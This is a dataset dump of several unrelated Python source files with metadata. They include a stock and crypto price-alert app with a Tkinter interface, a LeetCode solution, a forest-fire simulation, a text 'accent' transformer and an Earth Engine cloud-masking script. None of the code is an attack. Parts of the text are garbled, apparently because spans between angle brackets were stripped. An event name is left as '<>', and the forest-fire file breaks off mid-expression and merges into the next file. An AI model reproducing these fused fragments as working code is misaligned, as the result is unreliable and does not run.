LandmarkRepresentation.Representation.ANCHORED_3D,\n LandmarkRepresentation.Representation.ANCHORED_FULL_INVERSE_DEPTH,\n LandmarkRepresentation.Representation.ANCHORED_MSCKF_INVERSE_DEPTH,\n LandmarkRepresentation.Representation.ANCHORED_INVERSE_DEPTH_SINGLE,\n ]", "repo_name": "karthiknambiar29/openvins_python", "sub_path": "src/ov_core/scripts/types/landmarkrepresentation.py", "file_name": "landmarkrepresentation.py", "file_ext": "py", "file_size_in_byte": 2636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "enum.Enum", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "37344770348", "text": "import requests\nimport pprint\nimport csv\nimport smtplib\nimport os\nfrom datetime import datetime, timedelta\nfrom tkinter import *\nfrom twilio.rest import Client\nfrom requests.auth import HTTPBasicAuth\nfrom tkinter import messagebox\n\nMY_EMAIL = \"durubum@yahoo.com\"\nPASSWORD = os.getenv(\"PASSWORD\")\nVIRTUAL_TWILIO_NUMBER = \"\"\nVERIFIED_NUMBER = \"\"\nPASS = os.getenv(\"PASS\")\nBASIC = HTTPBasicAuth('golddust588', PASS)\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nCOIN_ENDPOINT = \"https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\nSHEETY_ENDPOINT = os.getenv(\"SHEETY_ENDPOINT\")\n\nALPHA_VANTAGE_API = os.getenv(\"ALPHA_VANTAGE_API\")\nCOINMARKETCAP_API_KEY = os.getenv(\"COINMARKETCAP_API_KEY\")\nNEWS_API_KEY = os.getenv(\"NEWS_API_KEY\")\nTWILIO_SID = \"\"\nTWILIO_AUTH_TOKEN = \"\"\n\n# ---------------------------- STOCKS TO BE IN UI ------------------------------------------------------------------ #\n# From https://www.nasdaq.com/market-activity/stocks/screener downloaded csv of Mega ($200>B) market cap stock\n# information at February 2023.\n\nwith open(\"top_stocks.csv\") as file:\n data = csv.reader(file)\n stock_symbols = []\n for row in data:\n if row[0] != \"Symbol\":\n stock_symbols.append(row[0])\n # print(stock_symbols)\n\nwith open(\"top_stocks.csv\") as file:\n data = csv.reader(file)\n full_stock_names = []\n for row in data:\n if row[1] != \"Name\":\n full_stock_names.append(row[1])\n # print(full_stock_names)\n\n# ---------------------------- COINS TO BE IN UI ------------------------------------------------------------------- #\n\n# Get top crypto by market cap information\nparameters = {\n \"start\": \"1\",\n \"limit\": \"15\",\n \"convert\": \"USD\",\n}\nheaders = {\n 'Accepts': 'application/json',\n 'X-CMC_PRO_API_KEY': COINMARKETCAP_API_KEY,\n}\n\nresponse = requests.get(url=COIN_ENDPOINT, params=parameters, headers=headers)\nresponse.raise_for_status()\n\ncoin_data = response.json()\n# pprint.pprint(coin_data)\n\n# Received coin_data is not sorted by the name of the Coin, but by the current market cap, so I decided to\n# make it myself.\n\n# This filters top 15 coin names from www.Coinbase.com based on Market Cap.\ncoin_symbols = []\nfor n in range(15):\n coin_symbols.append(coin_data[\"data\"][n][\"name\"])\n\n# ---------------------------- UI SETUP -------------------------------------------------------------------------- #\n\nwindow = Tk()\nwindow.title(\"Stock-Coin market news alert app\")\nwindow.config(padx=10, pady=10)\n\ncanvas = Canvas(width=600, height=304, highlightthickness=0)\nlock_img = PhotoImage(file=\"logo.png\")\ncanvas.create_image(300, 152, image=lock_img)\nfirst_text = canvas.create_text(400, 20, text=\"1. Choose a stock or a crypto you are interested in\",\n fill=\"green\", font=(\"Arial\", 11))\nsecond_text = canvas.create_text(400, 60, text=\"2. Select the percentage of daily price\\n change to be alerted\",\n fill=\"green\", font=(\"Arial\", 11))\nthird_text = canvas.create_text(150, 260, text=\"3. 
Enter your email to subscribe!\",\n fill=\"green\", font=(\"Arial\", 11))\ncanvas.grid(column=0, row=0, columnspan=3)\n\n# Labels:\n\nstock_label = Label(text=\"Choose a stock:\")\nstock_label.grid(column=0, row=1)\n\ncrypto_label = Label(text=\"Choose a crypto:\")\ncrypto_label.grid(column=0, row=2)\n\npercentage_label = Label(text=\"What percentage of price jump/drop you are interested in?:\")\npercentage_label.grid(column=0, row=3)\n\nemail_label = Label(text=\"Your email:\")\nemail_label.grid(column=0, row=4)\n\nsubscribe_label = Label(text=\"You can subscribe to one stock/crypto\\n price volatility alert at a time\",\n font=(\"Arial\", 10, \"bold\"))\nsubscribe_label.grid(column=0, row=5)\n\n\n# Spinbox\n\ndef spinbox_used():\n # gets the current value in spinbox.\n return spinbox.get()\n\n\nspinbox = Spinbox(from_=0, to=15, width=7, command=spinbox_used)\nspinbox.grid(column=1, row=3)\n\n# Entries:\n\nemail_entry = Entry(width=42)\nemail_entry.grid(column=1, row=4, columnspan=2)\n\n\ndef get_email():\n return email_entry.get()\n\n\n# Listbox with a scrollbar\n\nselected_stock = None # global variable\nselected_crypto = None # global variable\n\n\ndef on_stock_listbox_click(event):\n # Gets current selection from stock listbox\n global selected_stock\n global selected_crypto\n selected_stock = event.widget.get(event.widget.curselection())\n selected_crypto = None\n print(f\"Selected item: {selected_stock}\")\n\n\nstock_scrollbar = Scrollbar()\nstock_listbox = Listbox(height=6, yscrollcommand=stock_scrollbar.set)\nstock_listbox.grid(column=1, row=1)\nfor item in stock_symbols:\n stock_listbox.insert(stock_symbols.index(item), item)\nstock_listbox.selection_clear(0, END)\nstock_listbox.bind(\"<>\", on_stock_listbox_click)\nstock_scrollbar.config(command=stock_listbox.yview)\nstock_scrollbar.grid(column=2, row=1)\n\n\ndef on_crypto_listbox_click(event):\n # Gets current selection from crypto listbox\n global selected_crypto\n global selected_stock\n selected_crypto = event.widget.get(event.widget.curselection())\n selected_stock = None\n print(f\"Selected item: {selected_crypto}\")\n\n\ncrypto_scrollbar = Scrollbar()\ncrypto_listbox = Listbox(height=6, yscrollcommand=crypto_scrollbar.set)\ncrypto_listbox.grid(column=1, row=2)\nfor item in coin_symbols:\n crypto_listbox.insert(coin_symbols.index(item), item)\ncrypto_listbox.selection_clear(0, END)\ncrypto_listbox.bind(\"<>\", on_crypto_listbox_click)\ncrypto_scrollbar.config(command=crypto_listbox.yview)\ncrypto_scrollbar.grid(column=2, row=2)\n\n\n# ---------------------------- SHEETY DATABASE UPLOAD SUBSCRIPTIONS FROM UI ----------------------------------------- #\n\ndef subscribe():\n global BASIC\n if len(get_email()) == 0:\n messagebox.showinfo(title=\"Error\", message=\"Please enter your email.\")\n elif float(spinbox_used()) == 0.00:\n messagebox.showinfo(title=\"Error\", message=\"Please choose price volatility you want to follow.\")\n elif float(spinbox_used()) < 0:\n messagebox.showinfo(title=\"Error\", message=\"Can not be negative volatility.\")\n elif selected_stock is None and selected_crypto is None:\n messagebox.showinfo(title=\"Error\", message=\"Please choose one stock or crypto currency to follow.\")\n elif selected_crypto is None:\n is_ok_stock = messagebox.askokcancel(title=\"Subscription\", message=f\"These are the details entered: \\nChosen\"\n f\" stock: {selected_stock}\\n\"\n f\"Volatility to be alerted: {spinbox_used()}\\n\"\n f\"Your email: {get_email()}\\n\"\n f\"Pres OK to subscribe!\")\n\n if is_ok_stock:\n 
sheety_post_body = {\n \"lapas1\": {\n \"stocks\": selected_stock,\n \"cryptocurrencies\": selected_crypto,\n \"volatility\": spinbox_used(),\n \"email\": get_email()\n }\n }\n requests.post(SHEETY_ENDPOINT, json=sheety_post_body, auth=BASIC)\n else:\n is_ok_crypto = messagebox.askokcancel(title=\"Subscription\", message=f\"These are the details entered: \\nChosen\"\n f\" crypto currency: {selected_crypto}\\n\"\n f\"Volatility to be alerted: {spinbox_used()}\\n\"\n f\"Your email: {get_email()}\\n\"\n f\"Pres OK to subscribe!\")\n\n if is_ok_crypto:\n sheety_post_body = {\n \"lapas1\": {\n \"stocks\": selected_stock,\n \"cryptocurrencies\": selected_crypto,\n \"volatility\": spinbox_used(),\n \"email\": get_email()\n }\n }\n requests.post(SHEETY_ENDPOINT, json=sheety_post_body, auth=BASIC)\n\n\n# Buttons:\n\nsubscribe_button = Button(text=\"Subscribe to get latest news!\", width=36, activebackground=\"green\", command=subscribe)\nsubscribe_button.grid(column=1, row=5, columnspan=2)\n\nwindow.mainloop()\n\n\n# ---------------------------- TAKING DATA FROM SHEETY DATABASE TO SEND NEWS----------------------------------------- #\n\n\ndef send_news(coin_symbols, coin_data, stock_symbols, full_stock_names):\n global SHEETY_ENDPOINT\n global BASIC\n global ALPHA_VANTAGE_API\n global NEWS_API_KEY\n global MY_EMAIL\n global PASSWORD\n global VIRTUAL_TWILIO_NUMBER\n global VERIFIED_NUMBER\n\n response = requests.get(SHEETY_ENDPOINT, auth=BASIC)\n sheety_data = response.json()\n pprint.pprint(sheety_data)\n\n for subscription in sheety_data[\"lapas1\"]:\n volatility = subscription[\"volatility\"]\n email = subscription[\"email\"]\n\n # ---------------------------- STOCK SECTION ------------------------------------------------------------ #\n if subscription[\"cryptocurrencies\"] == \"\":\n subscribed_stock = subscription[\"stocks\"]\n\n # Get yesterday's closing stock price. API offers only hourly (not daily) time series for free,\n # so I use that.\n parameters = {\n \"function\": \"TIME_SERIES_INTRADAY\",\n \"symbol\": subscribed_stock,\n \"interval\": \"60min\",\n \"outputsize\": \"compact\",\n \"apikey\": ALPHA_VANTAGE_API,\n }\n\n response = requests.get(url=\"https://www.alphavantage.co/query\", params=parameters)\n response.raise_for_status()\n\n stock_data = response.json()\n # pprint.pprint(stock_data)\n\n # Because Stock Exchange probably is not at the same time zone as customer's, a bug in code forms.\n # The code does not perform if customer's time is already past midnight, but Stock Exchange is still in\n # yesterday's time zone.\n # Also, need to keep in mind that prises are based on US exchange market witch closes on friday 20:00 pm and\n # opens on monday morning.\n\n yesterday_date = (datetime.now() - timedelta(1)).strftime('%Y-%m-%d')\n\n last_open_market_date = stock_data[\"Meta Data\"][\"3. Last Refreshed\"][:10]\n last_market_date_object = datetime.strptime(last_open_market_date, '%Y-%m-%d')\n day_before_last_market_date = (last_market_date_object - timedelta(1)).strftime('%Y-%m-%d')\n two_days_before_last_market_day = (last_market_date_object - timedelta(2)).strftime('%Y-%m-%d')\n try:\n yesterday_closing_price = stock_data[\"Time Series (60min)\"][f\"{last_open_market_date} 20:00:00\"][\n \"4. close\"]\n day_before_closing_price = stock_data[\"Time Series (60min)\"][f\"{day_before_last_market_date} \"\n f\"20:00:00\"][\"4. 
close\"]\n difference = abs(float(yesterday_closing_price) - float(day_before_closing_price))\n stock_percentage_diff = round(difference * 100 / float(day_before_closing_price), 3)\n\n # print(difference)\n print(stock_percentage_diff)\n\n except KeyError:\n yesterday_closing_price = stock_data[\"Time Series (60min)\"][f\"{day_before_last_market_date} 20:00:00\"][\n \"4. close\"]\n day_before_closing_price = stock_data[\"Time Series (60min)\"][f\"{two_days_before_last_market_day}\"\n f\" 20:00:00\"][\"4. close\"]\n difference = abs(float(yesterday_closing_price) - float(day_before_closing_price))\n stock_percentage_diff = round(difference * 100 / float(day_before_closing_price), 3)\n # print(difference)\n print(stock_percentage_diff)\n\n if stock_percentage_diff > float(volatility):\n\n # ---------------------------- NEWS ARTICLES API SETUP + SEND EMAIL OR SMS -------------------------- #\n\n # Filtering company name of the stock symbol. From full stock name we need only first two words:\n i = stock_symbols.index(subscribed_stock)\n selected_stock_full_name = full_stock_names[i]\n first_two_words = \" \".join(selected_stock_full_name.split()[:2])\n\n # Getting recent news\n\n parameters = {\n \"q\": first_two_words,\n \"from\": yesterday_date,\n \"sortBy\": \"populiarity\",\n \"apikey\": NEWS_API_KEY,\n \"language\": 'en'\n }\n\n response = requests.get(url=\"https://newsapi.org/v2/everything\", params=parameters)\n response.raise_for_status()\n\n news_data = response.json()\n three_articles = news_data[\"articles\"][0:3]\n\n first_title = (three_articles[0][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_description = (three_articles[0][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_url = (three_articles[0][\"url\"])\n second_title = (three_articles[1][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_description = (three_articles[1][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_url = (three_articles[1][\"url\"])\n\n # News subject attribute:\n\n def stock_up_down():\n if float(yesterday_closing_price) > float(day_before_closing_price):\n return \"Up\"\n else:\n return \"Down\"\n\n stock_subject = f\"{subscribed_stock} is {stock_up_down()} by {stock_percentage_diff}%\"\n stock_subject.replace('’', \"'\")\n\n # Sending two most popular news stories of the day associated with particular stock/crypto\n\n email_text = f\"On the last stock market closure {stock_subject}, comparing from the day before.\\n\" \\\n f\"Here are some news on {subscribed_stock}:\\n\" \\\n f\"Headline: {first_title}\\n\" \\\n f\"Brief: {first_description}\\n\" \\\n f\"Read more: {first_url}\\n\" \\\n f\"Second Headline: {second_title}\\n\" \\\n f\"Second Brief: {second_description}\\n\" \\\n f\"Read more: {second_url}\\n\"\n\n # Setting up email sending\n\n with smtplib.SMTP(\"smtp.mail.yahoo.com\", port=587) as connection:\n connection.starttls()\n connection.login(user=MY_EMAIL, password=PASSWORD)\n connection.sendmail(\n from_addr=MY_EMAIL,\n to_addrs=email,\n msg=f\"Subject:{stock_subject}\\n\\n{email_text}\"\n )\n\n # This function instead of email, sends SMS, which I 
prefer and use. For the sake of simplicity,\n # in the UI there is only email option.\n\n # client = Client(TWILIO_SID, TWILIO_AUTH_TOKEN)\n # message = client.messages.create(\n # body=f\"{subscribed_stock}: {stock_up_down}{stock_percentage_diff}%\\n\"\n # f\"Headline: {first_title}\\n\"\n # f\"Brief: {first_description}\",\n # from_=VIRTUAL_TWILIO_NUMBER,\n # to=VERIFIED_NUMBER\n # )\n # print(message.sid)\n\n # ---------------------------- COIN PRICE VOLATILITY ---------------------------------------- #\n else:\n subscribed_crypto = subscription[\"cryptocurrencies\"]\n i = coin_symbols.index(subscribed_crypto)\n coin_percentage_diff = coin_data[\"data\"][i][\"quote\"][\"USD\"][\"percent_change_24h\"]\n print(coin_percentage_diff)\n\n if abs(float(coin_percentage_diff)) > float(volatility):\n yesterday_date = (datetime.now() - timedelta(1)).strftime('%Y-%m-%d')\n\n # Getting recent news if needed\n\n parameters = {\n \"q\": subscribed_crypto,\n \"from\": yesterday_date,\n \"sortBy\": \"popularity\",\n \"apikey\": NEWS_API_KEY,\n \"language\": 'en'\n }\n\n response = requests.get(url=\"https://newsapi.org/v2/everything\", params=parameters)\n response.raise_for_status()\n\n news_data = response.json()\n three_articles = news_data[\"articles\"][0:3]\n\n first_title = (three_articles[0][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_description = (three_articles[0][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n first_url = (three_articles[0][\"url\"])\n second_title = (three_articles[1][\"title\"]).replace('’', \"'\").replace(\"—\", \"-\").replace(\"…\", \"...\")\\\n .replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_description = (three_articles[1][\"description\"]).replace('’', \"'\").replace(\"—\", \"-\")\\\n .replace(\"…\", \"...\").replace(\"‘\", \"'\").replace(\"“\", \"'\").replace(\"”\", \"'\")\n second_url = (three_articles[1][\"url\"])\n\n # News subject attribute:\n\n def coin_up_down():\n if float(coin_percentage_diff) > 0:\n return \"Up\"\n else:\n return \"Down\"\n\n coin_subject = f\"{subscribed_crypto} is {coin_up_down()} by {coin_percentage_diff}%\"\n coin_subject = coin_subject.replace('’', \"'\")  # str.replace() returns a new string, so assign it back\n\n email_text = f\"In the last 24h {coin_subject}.\\n\" \\\n f\"Here is some news on {subscribed_crypto}:\\n\" \\\n f\"Headline: {first_title}\\n\" \\\n f\"Brief: {first_description}\\n\" \\\n f\"Read more: {first_url}\\n\" \\\n f\"Second Headline: {second_title}\\n\" \\\n f\"Second Brief: {second_description}\\n\" \\\n f\"Read more: {second_url}\\n\"\n\n # Setting up email sending\n\n with smtplib.SMTP(\"smtp.mail.yahoo.com\", port=587) as connection:\n connection.starttls()\n connection.login(user=MY_EMAIL, password=PASSWORD)\n connection.sendmail(\n from_addr=MY_EMAIL,\n to_addrs=email,\n msg=f\"Subject:{coin_subject}\\n\\n{email_text}\"\n )\n\n # This function instead of email, sends SMS, which I prefer and use. 
For the sake of simplicity,\n # in the UI there is only email option.\n\n # client = Client(TWILIO_SID, TWILIO_AUTH_TOKEN)\n # message = client.messages.create(\n # body=f\"{subscribed_crypto}: {coin_up_down}{coin_percentage_diff}%\\n\"\n # f\"Headline: {first_title}\\n\"\n # f\"Brief: {first_description}\",\n # from_=VIRTUAL_TWILIO_NUMBER,\n # to=VERIFIED_NUMBER\n # )\n # print(message.sid)\n\n\nsend_news(coin_symbols=coin_symbols, coin_data=coin_data, stock_symbols=stock_symbols,\n full_stock_names=full_stock_names)\n", "repo_name": "golddust588/Stock-Crypto-price-change-tracking", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 20625, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 22, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 24, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 26, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 35, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 184, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 184, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 186, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 186, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 188, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 188, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 190, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 190, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 192, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 192, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 207, "usage_type": "call"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 209, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 209, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 224, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 248, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 250, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 270, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 282, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 282, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 282, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 285, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 285, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 286, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 287, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 328, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 369, "usage_type": 
"call"}, {"api_name": "datetime.datetime.now", "line_number": 399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 399, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 399, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 411, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 450, "usage_type": "call"}]}
+{"seq_id": "17718532948", "text": "# coding:utf-8\n\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n problem 287\n https://leetcode-cn.com/problems/find-the-duplicate-number/\n\n 给定一个包含 n + 1 个整数的数组 nums,其数字都在 1 到 n 之间(包括 1 和 n),可知至少存在一个重复的整数。\n 假设只有一个重复的整数,找出这个重复的数。\n\n 示例 1:\n 输入: [1,3,4,2,2]\n 输出: 2\n\n 示例 2:\n 输入: [3,1,3,4,2]\n 输出: 3\n\n 说明:\n 不能更改原数组(假设数组是只读的)。\n 只能使用额外的 O(1) 的空间。\n 时间复杂度小于 O(n^2) 。\n 数组中只有一个重复的数字,但它可能不止重复出现一次。\n \"\"\"\n\n def findDuplicate(self, nums: List[int]) -> int:\n size = len(nums)\n left, right = 1, size - 1\n\n while left < right:\n mid = (left + right) >> 1\n cnt = 0\n for num in nums:\n if num <= mid:\n cnt += 1\n\n # 根据抽屉原理,小于等于 4 的数的个数如果严格大于 4 个,\n # 此时重复元素一定出现在 [1, 4] 区间里\n if cnt > mid:\n # 重复的元素一定出现在 [left, mid] 区间里\n right = mid\n else:\n # if 分析正确了以后,else 搜索的区间就是 if 的反面\n # [mid + 1, right]\n left = mid + 1\n return left\n\n def _tortoise_and_rabbit_cyclic_detection_(self, nums: List[int]) -> int:\n \"\"\"\n 不要求掌握,大概了解就行\n 弗洛伊德的乌龟和兔子(循环检测,鸽舍原理,抽屉原理)\n https://leetcode-cn.com/problems/find-the-duplicate-number/solution/xun-zhao-zhong-fu-shu-by-leetcode/\n \"\"\"\n # Find the intersection point of the two runners.\n tortoise = nums[0]\n hare = nums[0]\n while True:\n tortoise = nums[tortoise]\n hare = nums[nums[hare]]\n if tortoise == hare:\n break\n\n # Find the \"entrance\" to the cycle.\n ptr1 = nums[0]\n ptr2 = tortoise\n while ptr1 != ptr2:\n ptr1 = nums[ptr1]\n ptr2 = nums[ptr2]\n\n return ptr1\n\n\nif __name__ == '__main__':\n nums = [3, 1, 3, 4, 2]\n res = Solution().findDuplicate(nums)\n print(res)\n", "repo_name": "weiguozhao/LeetCodes", "sub_path": "src/_python/hot100/287_FindtheDuplicateNumber.py", "file_name": "287_FindtheDuplicateNumber.py", "file_ext": "py", "file_size_in_byte": 2399, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}]}
+{"seq_id": "11577779608", "text": "import numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nimport sys\r\n\r\n\r\nargs = sys.argv\r\nn_args = len(args)\r\nforest_shape = (int(args[1]),int(args[1])) if n_args>1 else (200,200) \r\nforest_density = float(args[2]) if n_args>1 else 0.7\r\np_fire = float(args[3]) if n_args>1 else 0.1\r\np_extinguish = float(args[4]) if n_args>1 else 0.08\r\n\r\ndef make_forest(shape, density):\r\n forest = np.zeros(shape)\r\n for i in range(len(forest)):\r\n for j in range(len(forest[i])):\r\n r = np.random.rand()\r\n if r < density:\r\n forest[i][j] = 1 #plant tree\r\n return forest\r\n\r\nforest = make_forest(forest_shape, forest_density)\r\nburning_trees = []\r\n\r\ndef get_first_tree():\r\n i = np.random.randint(forest.shape[0])\r\n j = np.random.randint(forest.shape[1])\r\n\r\n if forest[i][j] == 1:\r\n return (i,j)\r\n else:\r\n return get_first_tree()\r\n\r\n\r\nfirst_tree = get_first_tree()\r\nforest[first_tree[0]][first_tree[1]] = 2\r\nburning_trees.append(first_tree)\r\n\r\n\r\ndef step():\r\n burning_aux=[]\r\n\r\n for tree in burning_trees:\r\n adjecent_trees = get_adjecent_trees(tree)\r\n for adj_tree in adjecent_trees:\r\n r = np.random.rand()\r\n if r Generator[str, None, None]:\n yield from random.choices(CURSED_ES, k=count)\n\n\ndef next_cursed_e(ctx: ReplacementContext) -> str:\n if ctx.state is None:\n # this is a little hack for knowing the amount of e's we will need ahead of time.\n # this number will usually be greater than the actual amount of e's used because\n # not all letters are replaced, but the advantage is using random.choices only\n # once\n ctx.state = cursed_e_generator(len(ctx.source))\n\n return next(ctx.state)\n\n\ndef e(m: Match) -> str:\n if m.severity < 5:\n return \"e\" if m.original.islower() else \"E\"\n\n elif m.severity < 10:\n return \"E\"\n\n return next_cursed_e(m.context)\n\n\nclass E(Accent):\n \"\"\"Eeeeee eeeeeeeeeee eee eeee.\"\"\"\n\n PATTERNS = {\n r\"[a-z]\": e,\n }\n", "repo_name": "Fogapod/pink-accents", "sub_path": "examples/e.py", "file_name": "e.py", "file_ext": "py", "file_size_in_byte": 1117, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "random.choices", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Generator", "line_number": 13, "usage_type": "name"}, {"api_name": "pink_accents.ReplacementContext", "line_number": 17, "usage_type": "name"}, {"api_name": "pink_accents.Match", "line_number": 28, "usage_type": "name"}, {"api_name": "pink_accents.Accent", "line_number": 38, "usage_type": "name"}]}
+{"seq_id": "5129863055", "text": "#################################\n# Modules #\n#################################\n\nimport ee\nfrom datetime import datetime\nfrom IPython.display import Image, display,HTML\nfrom ee_ipl_uv import multitemporal_cloud_masking\nfrom ee_ipl_uv import download\nimport os\nimport requests\n\nee.Initialize()\n\n\n\n#################################\n# DATA #\n#################################\n\n# Image & dataset name \nimage_index = \"LC08_204020_20180704\" # Image to remove clouds\ndataset_index = 'LANDSAT/LC08/C01/T1_TOA' # Dataset containing picture\n\n# Import Image from Google Earth Data\nimage_predict_clouds = ee.Image(dataset_index + '/' + image_index) \n\n# Area analyzed\nregion_of_interest = ee.Geometry.Polygon(\n [[[-2.775208282272615,57.01860739003285],\n [-2.453858184616365,57.01860739003285],\n [-2.453858184616365,57.18122162676308],\n [-2.775208282272615,57.18122162676308]]])\n\n# Date of image analyzed\ndatetime_image = datetime.utcfromtimestamp(image_predict_clouds.get(\"system:time_start\") \\\n .getInfo()/1000) \\\n .strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#################################\n# Visualization Image #\n#################################\nimageRGB = image_predict_clouds.visualize(max=.3,bands=[\"B4\",\"B3\",\"B2\"])\nimage_file_original = download.MaybeDownloadThumb(imageRGB.clip(region_of_interest),params={\"dimensions\": \"400x400\"})\n\ndef viz_cloudscore_mask(cloudscoremask):\n cloudscoremask_vis = cloudscoremask.updateMask(cloudscoremask)\n cloudscoremask_vis = cloudscoremask_vis.visualize(max=1,min=0,palette=['1f77b4', 'ff7f0e'])\n mosaic = ee.ImageCollection([imageRGB, cloudscoremask_vis]).mosaic()\n return download.MaybeDownloadThumb(mosaic.clip(region_of_interest),params={\"dimensions\": \"400x400\"})\n\n\n#################################\n# Méthod persistence #\n#################################\ncloud_score_persistence, pred_persistence = multitemporal_cloud_masking.CloudClusterScore(image_predict_clouds,\n region_of_interest,\n method_pred=\"persistence\")\npersistence_pred_file = download.MaybeDownloadThumb(pred_persistence.clip(region_of_interest),\n params={\"dimensions\": \"400x400\",\n \"bands\":\"B4_forecast,B3_forecast,B2_forecast\",\n \"max\":.3})\n", "repo_name": "alexandreb09/Sentinel-Cloud-Masking", "sub_path": "Build_model/Methods_cloud_masking/NoteBooks/Landsat8_Extraction_nuage.py", "file_name": "Landsat8_Extraction_nuage.py", "file_ext": "py", "file_size_in_byte": 2719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "ee.Initialize", "line_number": 13, "usage_type": "call"}, {"api_name": "ee.Image", "line_number": 26, "usage_type": "call"}, {"api_name": "ee.Geometry.Polygon", "line_number": 29, "usage_type": "call"}, {"api_name": "ee.Geometry", "line_number": 29, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "name"}, {"api_name": "ee_ipl_uv.download.MaybeDownloadThumb", "line_number": 44, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download", "line_number": 44, "usage_type": "name"}, {"api_name": "ee.ImageCollection", "line_number": 49, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download.MaybeDownloadThumb", "line_number": 50, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download", "line_number": 50, "usage_type": "name"}, {"api_name": 
"ee_ipl_uv.multitemporal_cloud_masking.CloudClusterScore", "line_number": 56, "usage_type": "call"}, {"api_name": "ee_ipl_uv.multitemporal_cloud_masking", "line_number": 56, "usage_type": "name"}, {"api_name": "ee_ipl_uv.download.MaybeDownloadThumb", "line_number": 59, "usage_type": "call"}, {"api_name": "ee_ipl_uv.download", "line_number": 59, "usage_type": "name"}]}
